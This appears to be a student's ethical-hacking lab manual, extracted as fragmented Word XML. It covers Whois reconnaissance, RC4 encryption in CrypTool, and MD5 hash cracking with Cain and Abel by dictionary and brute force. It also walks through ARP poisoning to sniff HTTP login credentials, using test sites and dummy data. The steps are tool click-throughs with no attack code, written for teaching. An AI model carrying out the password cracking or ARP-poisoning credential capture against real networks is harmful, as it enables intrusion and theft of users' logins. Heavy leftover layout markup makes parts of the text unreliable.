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Practical No.1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Aim:-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Use Google and Whois for Reconnaissance.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1: Open the WHO.is website (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0563c1"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://who.is/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="00000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) 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3961697" cy="1995333"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132507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1697" cy="1995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2: Enter the website name and hit the “Enter button”.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(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u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ckthakurcollege.net/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4304480" cy="2204221"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4480" cy="2204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3: Show you information about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(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u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.ckthakurcollege.net/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831644" cy="2030016"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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1644" cy="2030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3717452" cy="2943979"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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7452" cy="2943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Second Website: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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.flipkart.com/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Step1: Open the WHO.is website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2: Enter the website name and hit the “Enter button”.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Step 3: Show the information about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sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.flipkart.com/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2712743" cy="2952128"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2743" cy="2952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4197871" cy="2494168"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132507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7871" cy="2494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Practical No. 2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Aim :-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Use CrypTool to encrypt and decrypt passwords using RC4 algorithm.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Open the CrypTool Application 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1.4.42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) : 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3106992" cy="1650567"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132507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6992" cy="1650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Click on File&gt;New&gt;Save it&gt;Add text to encrypt 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3386865" cy="1799248"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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865" cy="179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Now in toolbar go to Encrypt/Decrypt&gt;Symmetric(modern)&gt;RC 4 Algorithm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Provide the Key Entry for RC 4 :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3282400" cy="1744117"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2400" cy="1744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Click on Encrypt button :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4602471" cy="1501693"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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2471" cy="1501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Now with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encrypted window selected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, click on toolbar&gt;Encrypt/Decrypt&gt;Symmetric(modern)&gt;RC 4 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Provide the same key , then click on Decrypt button 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4786945" cy="1524759"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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945" cy="1524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Practical No. 3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 -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Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords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and install: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“Winpcap”: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https://www.winpcap.org/install/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“Cain and Abel” (v4.9.56): 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https://web.archive.org/web/20190601183155/http://www.oxid.it/cain.html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Cain and Abel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select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Hash Calculator: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797012" cy="1738651"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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7012" cy="1738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any TEXT in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“Text to Hash”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Field &gt; Click on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Calculate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-&gt; Copy the Hash Value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the text from C:\Program Files (x86)\Cain\Wordlists folder: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798026" cy="2394721"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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8026" cy="2394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Now, Select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“Cracker”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 &gt; Select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MD5 Hashes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 from LEFT WINDOW Click on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“+”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ADD New Hash to the LIST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167852" cy="2295874"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132508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852" cy="2295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Dictionary Attack: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Right Click on the Value &amp; Select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“Dictionary Attack”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr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→</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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330370" cy="2412264"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0370" cy="2412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Right click below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File column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&gt; Add to list &gt; then select the C:\Program Files (x86)\Cain\Wordlists file&gt; then click on start button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40397" cy="2233179"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0397" cy="2233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878389" cy="2630922"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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8389" cy="2630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740836" cy="3419220"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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0836" cy="3419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Bruteforce Attack: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Brute-Force attack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now&gt; Start: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15761" cy="3078564"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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5761" cy="3078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3834017" cy="2829849"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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4017" cy="2829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3896236" cy="2875773"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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6236" cy="2875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Practical No. 4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Aim:-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Run and analyse the output of following commands in windows – ifconfig, ping, netstat, traceroute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ifconfig (ipconfig):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4942357" cy="2539625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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357" cy="253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ping: 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946863" cy="2157963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21213250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6863" cy="215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netstat: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946851" cy="3355265"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132506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6851" cy="3355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traceroute (tracert): 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5180128" cy="2661803"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132506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0128" cy="2661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Practical No. 5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 -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Perform ARP Poisoning in Windows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and install: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“Winpcap”: </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://www.winpcap.org/install/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“Cain and Abel” (v4.9.56): </w:t>
      </w:r>
      <w:hyperlink r:id="rId40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https://web.archive.org/web/20190601183155/http://www.oxid.it/cain.html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“Cain &amp; Abel” &gt; Click “Configure -&gt; Make Changes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Arp poison routing section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&gt;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Arp request packets &gt;Apply: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21203" cy="2969556"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132506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1203" cy="2969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Now, Select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“Sniffer”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TAB &gt; Click On ICON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Start/Stop APR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-&gt; Again the Bottom, Select “Hosts” TAB &gt; “ + ” to ADD ICON to Scan for Hosts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877078" cy="1622116"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212132506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7078" cy="1622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Mac Address Scanner</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_1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” Window &gt; Select Target According to your Network, Here we’ll be looking for 2 Hosts Specifically &gt; Check “All Test” CHECKBOX &gt; Click on “OK → Shortly after Scanning, All HOST will be shown</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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77340" cy="2560320"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2121325067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2560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688965" cy="2326640"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2121325068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326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Switch TAB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“APR”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&gt; “+” to ADD SCANNED HOST. Select Target 2 Hosts &gt; Click on “OK”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4815840" cy="2833242"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213249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36775" y="2362175"/>
                          <a:ext cx="4815840" cy="2833242"/>
                          <a:chOff x="2936775" y="2362175"/>
                          <a:chExt cx="4818450" cy="2835650"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2938080" y="2363379"/>
                            <a:ext cx="4815840" cy="2833242"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6600825" cy="378979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600825" cy="3789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" name="Shape 10"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId4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62" y="4762"/>
                              <a:ext cx="6581775" cy="24479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1" name="Shape 11"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6600825" cy="2466975"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="2466975" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2466975" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="2462212"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2466975" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="2462212"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="2462212"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2466975" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="2466974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" name="Shape 12"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId4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62" y="2553639"/>
                              <a:ext cx="6581775" cy="666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" name="Shape 13"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="2544114"/>
                              <a:ext cx="6600825" cy="685800"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="685800" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="685800" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="681037"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="685800" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="681037"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="681037"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="685800" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="685800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976437" y="1227571"/>
                              <a:ext cx="4238624" cy="25526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5" name="Shape 15"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="1971674" y="1218046"/>
                              <a:ext cx="4257675" cy="2571750"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="2571750" w="4257675">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4252912" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2571750" w="4257675">
                                  <a:moveTo>
                                    <a:pt x="4252912" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4252912" y="2566987"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2571750" w="4257675">
                                  <a:moveTo>
                                    <a:pt x="4257675" y="2566987"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="2566987"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2571750" w="4257675">
                                  <a:moveTo>
                                    <a:pt x="4762" y="2571750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815840" cy="2833242"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121324996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5840" cy="283324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Toggle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“Start/Stop APR”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To Change STATUS from “IDLE” To “Poisoning”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4753610" cy="990600"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213249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67850" y="3283700"/>
                          <a:ext cx="4753610" cy="990600"/>
                          <a:chOff x="2967850" y="3283700"/>
                          <a:chExt cx="4756300" cy="992600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2969195" y="3284700"/>
                            <a:ext cx="4753610" cy="990600"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6600825" cy="12477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600825" cy="1247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" name="Shape 7"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId4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62" y="4762"/>
                              <a:ext cx="6581775" cy="12287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8" name="Shape 8"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6600825" cy="1247775"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="1247775" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1247775" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="1243012"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1247775" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="1243012"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="1243012"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1247775" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="1247775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753610" cy="990600"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121324995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53610" cy="990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5113020" cy="525780"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213249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88400" y="3516325"/>
                          <a:ext cx="5113020" cy="525780"/>
                          <a:chOff x="2788400" y="3516325"/>
                          <a:chExt cx="5115200" cy="527350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2789490" y="3517110"/>
                            <a:ext cx="5113020" cy="525780"/>
                            <a:chOff x="0" y="1389380"/>
                            <a:chExt cx="6600825" cy="628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1389380"/>
                              <a:ext cx="6600825" cy="628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" name="Shape 17"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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62" y="1398905"/>
                              <a:ext cx="6581775" cy="609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" name="Shape 18"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="1389380"/>
                              <a:ext cx="6600825" cy="628650"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="628650" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="628650" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="623887"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="628650" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="623887"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="623887"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="628650" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="628650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113020" cy="525780"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121324997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13020" cy="52578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Both HOST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“ping” </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_2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each Other → After Check The APR Activity →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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(HOST-1 </w:t>
      </w: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➔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“172.16.0.130”)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(HOST-2 </w:t>
      </w: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➔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“172.16.0.131”)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-165099</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3007995" cy="3819525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="212132500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41550" y="1869575"/>
                          <a:ext cx="3007995" cy="3819525"/>
                          <a:chOff x="3841550" y="1869575"/>
                          <a:chExt cx="3008900" cy="3820850"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3842003" y="1870238"/>
                            <a:ext cx="3007995" cy="3819525"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="3305175" cy="4429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05175" cy="442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5" name="Shape 35"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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62" y="4762"/>
                              <a:ext cx="3286125" cy="43070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6" name="Shape 36"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="3305175" cy="4429125"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="4429125" w="3305175">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="3300412" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3305175">
                                  <a:moveTo>
                                    <a:pt x="3300412" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="3300412" y="4424362"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3305175">
                                  <a:moveTo>
                                    <a:pt x="3305175" y="4424362"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="4424362"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3305175">
                                  <a:moveTo>
                                    <a:pt x="4762" y="4429125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-165099</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3007995" cy="3819525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121325003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07995" cy="3819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25400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3024505" cy="3819525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="212132499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33300" y="1869575"/>
                          <a:ext cx="3024505" cy="3819525"/>
                          <a:chOff x="3833300" y="1869575"/>
                          <a:chExt cx="3025400" cy="3820850"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="3833748" y="1870238"/>
                            <a:ext cx="3024505" cy="3819525"/>
                            <a:chOff x="3419475" y="0"/>
                            <a:chExt cx="3324225" cy="4429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419475" y="0"/>
                              <a:ext cx="3324225" cy="442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5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424237" y="4762"/>
                              <a:ext cx="3305174" cy="41980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" name="Shape 5"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="3419475" y="0"/>
                              <a:ext cx="3324225" cy="4429125"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="4429125" w="3324225">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="3319462" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3324225">
                                  <a:moveTo>
                                    <a:pt x="3319462" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="3319462" y="4424362"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3324225">
                                  <a:moveTo>
                                    <a:pt x="3324225" y="4424362"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="4424362"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="4429125" w="3324225">
                                  <a:moveTo>
                                    <a:pt x="4762" y="4429125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25400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3024505" cy="3819525"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121324994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24505" cy="3819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4102100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5570220" cy="1378585"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="212132500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60050" y="3089750"/>
                          <a:ext cx="5570220" cy="1378585"/>
                          <a:chOff x="2560050" y="3089750"/>
                          <a:chExt cx="5571900" cy="1380500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2560890" y="3090708"/>
                            <a:ext cx="5570220" cy="1378585"/>
                            <a:chOff x="0" y="4558030"/>
                            <a:chExt cx="6753225" cy="17145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4558030"/>
                              <a:ext cx="6753225" cy="1714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2" name="Shape 32"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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62" y="4567555"/>
                              <a:ext cx="6734175" cy="169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3" name="Shape 33"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="4558030"/>
                              <a:ext cx="6753225" cy="1714500"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="1714500" w="6753225">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6748462" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1714500" w="6753225">
                                  <a:moveTo>
                                    <a:pt x="6748462" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6748462" y="1709737"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1714500" w="6753225">
                                  <a:moveTo>
                                    <a:pt x="6753225" y="1709737"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="1709737"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="1714500" w="6753225">
                                  <a:moveTo>
                                    <a:pt x="4762" y="1714500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4102100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5570220" cy="1378585"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="114300" distR="114300"/>
                <wp:docPr id="2121325002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0220" cy="13785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NOW, Switch TAB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“Passwords”</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_5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→ Select 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“HTTP” </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_6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from LEFT WINDOW → Visit any Not Secure (*http) Login Site and Login with dummy data.</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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(eg.</w:t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🔗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hyperlink r:id="rId5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http://testphp.vulnweb.com/login.php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)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hyperlink r:id="rId5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http://demo.t3-framework.org/joomla30/index.php/en/joomla-pages/sample-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hyperlink r:id="rId56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page-2/login-page</w:t>
        </w:r>
      </w:hyperlink>
      <w:sdt>
        <w:sdtPr>
          <w:tag w:val="goog_rdk_7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) →</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt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5128260" cy="1485900"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="21213249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80800" y="3035625"/>
                          <a:ext cx="5128260" cy="1485900"/>
                          <a:chOff x="2780800" y="3035625"/>
                          <a:chExt cx="5130400" cy="1488750"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2781870" y="3037050"/>
                            <a:ext cx="5128260" cy="1485900"/>
                            <a:chOff x="204787" y="0"/>
                            <a:chExt cx="6600825" cy="21050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04787" y="0"/>
                              <a:ext cx="6600825" cy="2105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" name="Shape 23"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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9550" y="4762"/>
                              <a:ext cx="6581775" cy="2085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" name="Shape 24"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="204787" y="0"/>
                              <a:ext cx="6600825" cy="2105025"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="2105025" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2105025" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="2100262"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2105025" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="2100262"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="2100262"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="2105025" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="2105025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128260" cy="1485900"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121324999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28260" cy="14859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5419725" cy="777240"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="212132499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35275" y="3390750"/>
                          <a:ext cx="5419725" cy="777240"/>
                          <a:chOff x="2635275" y="3390750"/>
                          <a:chExt cx="5421450" cy="778500"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="2636138" y="3391380"/>
                            <a:ext cx="5419725" cy="777240"/>
                            <a:chOff x="0" y="0"/>
                            <a:chExt cx="6600825" cy="8953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600825" cy="895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" name="Shape 20"/>
                            <pic:cNvPicPr preferRelativeResize="0"/>
                          </pic:nvPicPr>
                          <pic:blipFill rotWithShape="1">
                            <a:blip r:embed="rId5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62" y="9525"/>
                              <a:ext cx="6581775" cy="8762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1" name="Shape 21"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="6600825" cy="895350"/>
                            </a:xfrm>
                            <a:custGeom>
                              <a:rect b="b" l="l" r="r" t="t"/>
                              <a:pathLst>
                                <a:path extrusionOk="0" h="895350" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="0" y="4762"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="4762"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="895350" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6596062" y="0"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="6596062" y="890587"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="895350" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="6600825" y="890587"/>
                                  </a:moveTo>
                                  <a:lnTo>
                                    <a:pt x="4762" y="890587"/>
                                  </a:lnTo>
                                </a:path>
                                <a:path extrusionOk="0" h="895350" w="6600825">
                                  <a:moveTo>
                                    <a:pt x="4762" y="895350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419725" cy="777240"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="2121324998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19725" cy="77724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5117160" cy="2278380"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
